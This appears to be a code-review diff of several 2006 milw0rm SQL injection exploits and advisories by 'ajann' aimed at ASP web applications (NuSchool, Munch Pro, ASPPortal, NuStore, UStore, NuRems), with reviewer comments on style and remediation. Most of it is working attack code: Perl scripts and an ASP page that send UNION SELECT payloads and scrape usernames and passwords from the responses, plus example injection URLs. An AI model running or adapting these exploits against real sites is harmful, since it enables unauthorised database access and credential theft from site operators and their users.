|
||||
|
||||
if ($answer =~ /Address:(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /# Rooms:(.*?)<\/font>/){
|
||||
print "+ Email: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
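Review bot: the usage banner is inconsistent: `[// Usage: class.pl [target] [path] [userid]` names the script `class.pl` while the two example lines directly below it call it `exploit.pl`, and the header comment gives no file name at all; pick one. The payload line `$target = "16%20union%20select%200,Username,password,Email,0,...` differs from the sibling scripts in this commit, which all send `-1`, and the choice of `16` is not explained; whichever is intended, the 29-column shape of the query and the `agents` table name are assumptions about the NuRems schema that belong in the header comment, and the three regexes keyed on the page labels `Location:`, `Address:` and `# Rooms:` show that the injected columns are being read out of the listing template's own cells, which should also be said so a reader understands why "Username" prints under a location label. The `Ad removed or not yet approved` check and the `s/(http:\/\/)//eg` scheme strip (needless /e modifier, unused capture) carry over the same problems as in the NuCommunity script, and `use strict; use warnings;` are missing. For remediation the hunk shows that `PropID` on propertysdetails.asp is concatenated unparameterised; an integer cast or bound parameter closes it, and `union%20select` in `PropID` is the log signature.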
@ -1,20 +1,20 @@
|
|||
*******************************************************************************
|
||||
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
*******************************************************************************
|
||||
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
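Review bot: the advisory documents the injection point but omits the rest of what a reader needs: there is no description of what the example requests return, no affected-version statement beyond the `1.0` in the title, and no remediation. `###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]` identifies `SubCatagoryID` (the application's own spelling) as the unsanitised parameter, and the example `//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0` together with its `customeremail` variant shows a four-column `union select` that lands the `pass` column in the page's third field; state that explicitly, and add the fix, which is a parameterised query or integer validation of both `CategoryID` and `SubCatagoryID`. The `###` and `//` prefixes on the URL lines look like comment markers and are not explained anywhere in the text, which is confusing in a plain-text advisory; the `"""""""""""""""""""""` separator is likewise an unexplained convention.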
@ -1,69 +1,69 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "CampusNewsDetails.asp?NewsID=";
|
||||
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "CampusNewsDetails.asp?NewsID=";
|
||||
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
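Review bot: the literal in `$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];` is `select 00, UserName, ...`, which SQL parses as the integer 0 but reads like a typo for `0,`; write it as a single `0` so the four-column shape is obvious, and document that the column count and the `students` table are assumptions about CampusNewsDetails.asp. The success regexes `/<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/` and the `<td colspan=\"2\">` variant are bound to the default template's exact markup, so a restyled install returns the data without the script noticing; say so in the header. The `Ad removed or not yet approved` failure check is the same string used in the NuRems script and nothing here documents that a school news page emits it, so it is dead code as written. As in the sibling scripts, `use strict; use warnings;` are missing and `s/(http:\/\/)//eg` carries a needless /e. Remediation is the same: `NewsID` must be cast to an integer or bound as a parameter, and `union%20select` in `NewsID` is the log signature to alert on.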
@ -1,69 +1,69 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "switch.asp?pg=subMenu&catid=";
|
||||
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Under Construction, Please check back soon.../) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "switch.asp?pg=subMenu&catid=";
|
||||
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Under Construction, Please check back soon.../) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
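Review bot: the failure check `if ($answer =~ /Under Construction, Please check back soon.../) {` leaves the trailing dots unescaped, so they match any three characters rather than the literal ellipsis; the intended pattern ends in `\.\.\./`. Harmless here, but the same oversight in a looser pattern would fire on unrelated text. The success regexes `/74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/` and the `17%\" align=\"center\"` variant depend on the default template's cell widths and should be documented as template-specific, and the six-column `union select` against `users` in the `$target` line is an undocumented schema assumption. `use strict; use warnings;` are missing and `s/(http:\/\/)//eg` again carries a needless /e with an unused capture group. For defenders the hunk identifies `catid` on `switch.asp?pg=subMenu` as the unparameterised integer; integer validation or a bound parameter fixes it, and `union%20select` in `catid` is the signature to alert on.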
@ -1,192 +1,192 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="default1.asp"
|
||||
string2="default1.asp"
|
||||
cek= Request.Form("id")
|
||||
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1
|
||||
target2 = targettext+string2
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "POST" , come, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
Public Function take1(come1)
|
||||
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake1
|
||||
.Open "POST" , come1, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take1 = .Responsetext
|
||||
End With
|
||||
SET objtake1 = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take1(target2)
|
||||
|
||||
getdata=InStr(get_username,"Poll Question:</b> " )
|
||||
username=Mid(get_username,getdata+24,14)
|
||||
passwd=Mid(get_password,getdata+24,14)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>

</table>

<div id=htmlAlani></div>

<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>

<%

If islem = "get" Then

string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")


targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)

If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")

Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")

Else
%>

<%

target1 = targettext+string1
target2 = targettext+string2

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function

Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function

get_username = take(target1)
get_password = take1(target2)

getdata=InStr(get_username,"Poll Question:</b> " )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)

%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial"> User Password:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>

</table>

<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>

<%
End If
End If
End If
End If
Set objtake = Nothing
%>

# milw0rm.com [2006-11-12]
@ -1,19 +1,19 @@
*******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
*******************************************************************************

###http://[target]/[path]//detail.asp?ID=[SQL]

Example:

//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-12]
